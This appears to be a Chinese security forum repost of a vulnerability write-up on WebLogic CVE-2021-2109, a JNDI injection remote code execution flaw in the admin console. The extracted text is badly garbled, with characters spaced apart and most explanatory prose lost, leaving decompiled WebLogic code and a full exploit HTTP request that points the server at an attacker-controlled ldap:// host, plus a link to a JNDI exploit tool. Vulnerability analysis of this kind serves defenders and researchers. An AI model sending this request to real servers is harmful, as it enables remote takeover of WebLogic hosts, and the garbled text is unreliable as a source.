搜索

[1169] 2021-01-27_WebLogicCVE-2021-2109JNDIRCE

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-16
2021-01-27_WebLogicCVE-2021-2109JNDIRCE W e b L o g i c   C V E - 2 0 2 1 - 2 1 0 9   J N D I   R C E   Y 4 e r   C h a B u g   2 0 2 1 - 0 1 - 2 7 c o n s o l e J N D I 1 . w e b l o g i c   1 4 . 1 . 1 2 . j d k 8 u 1 1 2 3 . J N D I - I n j e c t i o n - E x p l o i t [ 1 ] c o n s o l e j n d i . p o r t a l   j n d i 西 J N D I B i n d i n g P a g e G e n e r a l
/ P o r t a l C o n f i g / j n d i / j n d i b i n d i n g . p o r t l e t c o m . b e a . c o n s o l e . a c t i o n s . j n d i . J N D I B i n d i n g A c t i o n # e x e c u t e
l o o k u p s e r v e r M B e a n   ! =   n u l l M B e a n U t i l s . g e t A n y S e r v e r M B e a n ( s e r v e r N a m e )
使 l o o k u p S e r v e r s e r v e r B e a n s e r v e r N a m e d o w h i l e 使 s e r v e r B e a n l o o k u p S e r v e r ( ) w e b l o g i c . m a n a g e m e n t . j m x . M B e a n S e r v e r I n v o c a t i o n H a n d l e r # i n v o k e m e t h o d w e b l o g i c . m a n a g e m e n t . c o n f i g u r a t i o n . D o m a i n M B e a n I m p l # l o o k u p S e r v e r A d m i n S e r v e r
s e r v e r B e a n j n d i   l o o k u p l o o k u p s e r v e r N a m e b i n d i n g H a n d l e J n d i B i n d i n g H a n d l e b i n d i n g H a n d l e . g e t C o n t e x t ( ) g e t C o m p o n e n t J n d i B i n d i n g H a n d l e   b i n d i n g H a n d l e   =   ( J n d i B i n d i n g H a n d l e ) t h i s . g e t H a n d l e C o n t e x t ( a c t i o n F o r m ,   r e q u e s t ,   " J N D I B i n d i n g " ) ; S t r i n g   c o n t e x t   =   b i n d i n g H a n d l e . g e t C o n t e x t ( ) ; S t r i n g   b i n d N a m e   =   b i n d i n g H a n d l e . g e t B i n d i n g ( ) ; S t r i n g   s e r v e r N a m e   =   b i n d i n g H a n d l e . g e t S e r v e r ( ) ; S t r i n g   p r e f i x   =   c o n t e x t ; S t r i n g   s u f f i x   =   b i n d N a m e ; i f   ( p r e f i x . l e n g t h ( )   >   0   & &   s u f f i x . l e n g t h ( )   >   0 )   { p r e f i x   =   p r e f i x   +   " . " ; } O b j e c t   b o u n d O b j   =   c . l o o k u p ( p r e f i x   +   s u f f i x )         p r o t e c t e d   S t r i n g   g e t C o m p o n e n t ( i n t   i n d e x )   {                 r e t u r n   t h i s . g e t C o m p o n e n t s ( ) [ i n d e x ] ;         } p r i v a t e   S t r i n g [ ]   g e t C o m p o n e n t s ( )   {         i f   ( t h i s . c o m p o n e n t s   = =   n u l l )   {
j n d i 1 . j n d i 2 . s e r v e r N a m e A d m i n S e r v e r                 S t r i n g   s e r i a l i z e d   =   t h i s . g e t O b j e c t I d e n t i f i e r ( ) ;                 A r r a y L i s t   c o m p o n e n t L i s t   =   n e w   A r r a y L i s t ( ) ;                 S t r i n g B u f f e r   c u r r e n t C o m p o n e n t   =   n e w   S t r i n g B u f f e r ( ) ;                 b o o l e a n   l a s t W a s S p e c i a l   =   f a l s e ;                 f o r ( i n t   i   =   0 ;   i   <   s e r i a l i z e d . l e n g t h ( ) ;   + + i )   {                         c h a r   c   =   s e r i a l i z e d . c h a r A t ( i ) ;                         i f   ( l a s t W a s S p e c i a l )   {                                 i f   ( c   = =   ' 0 ' )   {                                         i f   ( c u r r e n t C o m p o n e n t   = =   n u l l )   {                                                 t h r o w   n e w   A s s e r t i o n E r r o r ( " H a n d l e   c o m p o n e n t   a l r e a d y   n u l l   :   ' "   +   s e r i a l i z e d   +   ' " ' ) ;                                         }                                         i f   ( c u r r e n t C o m p o n e n t . l e n g t h ( )   >   0 )   {                                                 t h r o w   n e w   A s s e r t i o n E r r o r ( " N u l l   h a n d l e   c o m p o n e n t   p r e c e e d e d   b y   a   c h a r a c t e r   :   ' "   +   s e r i a l i z e d   +   " ' " ) ;                                         }                                         c u r r e n t C o m p o n e n t   =   n u l l ;                                 }   e l s e   i f   ( c   = =   ' ' )   {                                         i f   ( c u r r e n t C o m p o n e n t   = =   n u l l )   {                                                 t h r o w   n e w   A s s e r t i o n E r r o r ( " N u l l   h a n d l e   f o l l o w e d   b y     :   ' "   +   s e r i a l i z e d   +   " ' " ) ;                                         }                                         c u r r e n t C o m p o n e n t . a p p e n d ( ' ' ) ;                                 }   e l s e   {                                         i f   ( c   ! =   ' ; ' )   {                                                 t h r o w   n e w   A s s e r t i o n E r r o r ( "   i n   h a n d l e   f o l l o w e d   b y   a   c h a r a c t e r   : ' "   +   s e r i a l i z e d   +   " ' " ) ;                                         }                                         i f   ( c u r r e n t C o m p o n e n t   = =   n u l l )   {                                                 t h r o w   n e w   A s s e r t i o n E r r o r ( " N u l l   h a n d l e   f o l l o w e d   b y   ;   :   ' "   +   s e r i a l i z e d   +   " ' " ) ;                                         }                                         c u r r e n t C o m p o n e n t . a p p e n d ( ' ; ' ) ;                                 }                                 l a s t W a s S p e c i a l   =   f a l s e ;                         }   e l s e   i f   ( c   = =   ' ' )   {                                 i f   ( c u r r e n t C o m p o n e n t   = =   n u l l )   {                                         t h r o w   n e w   A s s e r t i o n E r r o r ( " N u l l   h a n d l e   f o l l o w e d   b y     :   ' "   +   s e r i a l i z e d   +   " ' " ) ;                                 }                                 l a s t W a s S p e c i a l   =   t r u e ;                         }   e l s e   i f   ( c   = =   ' ; ' )   {                                 S t r i n g   c o m p o n e n t   =   c u r r e n t C o m p o n e n t   ! =   n u l l   ?   c u r r e n t C o m p o n e n t . t o S t r i n g ( )   :   n u l l ;                                 c o m p o n e n t L i s t . a d d ( c o m p o n e n t ) ;                                 c u r r e n t C o m p o n e n t   =   n e w   S t r i n g B u f f e r ( ) ;                         }   e l s e   {                                 i f   ( c u r r e n t C o m p o n e n t   = =   n u l l )   {                                         t h r o w   n e w   A s s e r t i o n E r r o r ( " N u l l   h a n d l e   f o l l o w e d   b y     a   c h a r a c t e r   :   ' "   +   s e r i a l i z e d   +   " ' " ) ;                                 }                                 c u r r e n t C o m p o n e n t . a p p e n d ( c ) ;                         }                 }                 i f   ( l a s t W a s S p e c i a l )   {                         t h r o w   n e w   A s s e r t i o n E r r o r ( " L a s t   c h a r a c t e r   i n   h a n d l e   i s     : ' "   +   s e r i a l i z e d   +   " ' " ) ;                 }                 S t r i n g   c o m p o n e n t   =   c u r r e n t C o m p o n e n t   ! =   n u l l   ?   c u r r e n t C o m p o n e n t . t o S t r i n g ( )   :   n u l l ;                 c o m p o n e n t L i s t . a d d ( c o m p o n e n t ) ;                 t h i s . c o m p o n e n t s   =   ( S t r i n g [ ] ) ( ( S t r i n g [ ] ) c o m p o n e n t L i s t . t o A r r a y ( n e w   S t r i n g [ c o m p o n e n t L i s t . s i z e ( ) ] ) ) ;         }         r e t u r n   t h i s . c o m p o n e n t s ; } ; ;
e x p 1 . h t t p s : / / m p . w e i x i n . q q . c o m / s / w X 9 T M X l 1 K V W w B _ k 6 E Z O k l w R e f e r e n c e s   J N D I - I n j e c t i o n - E x p l o i t :   h t t p s : / / g i t h u b . c o m / w e l k 1 n / J N D I - I n j e c t i o n - E x p l o i t G E T   / c o n s o l e / c o n s o l e j n d i . p o r t a l ? _ p a g e L a b e l = J N D I B i n d i n g P a g e G e n e r a l & _ n f p b = t r u e & J N D I B i n d i n g P o r t l e t h a n d l e = c o m . b e a . c o n s o l e . h a n d l e s . J n d i B i n d i n g H a n d l e ( % 2 2 l d a p : / / 1 7 2 . 1 6 . 0 ; 1 : 1 3 8 9 / a e w 0 x y ; A d m i n S e r v e r % 2 2 ) H o s t :   1 7 2 . 1 6 . 1 . 1 3 4 : 7 0 0 1 P r a g m a :   n o - c a c h e C a c h e - C o n t r o l :   n o - c a c h e U p g r a d e - I n s e c u r e - R e q u e s t s :   1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 7 . 0 . 4 2 8 0 . 1 4 1   S a f a r i / 5 3 7 . 3 6 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / a v i f , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 , a p p l i c a t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 9 R e f e r e r :   h t t p : / / 1 7 2 . 1 6 . 1 . 1 3 4 : 7 0 0 1 / c o n s o l e / l o g i n / L o g i n F o r m . j s p A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 9 C o o k i e :   A D M I N C O N S O L E S E S S I O N = 8 X k 3 Y 9 p C j D L l U A R p W o E 3 r h i a 6 7 n 0 L K Y 5 x u T z T H f W x z 1 I T l N D O o b 1 ! 1 2 5 4 8 9 5 3 1 0 C o n n e c t i o n :   c l o s e n u l l

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理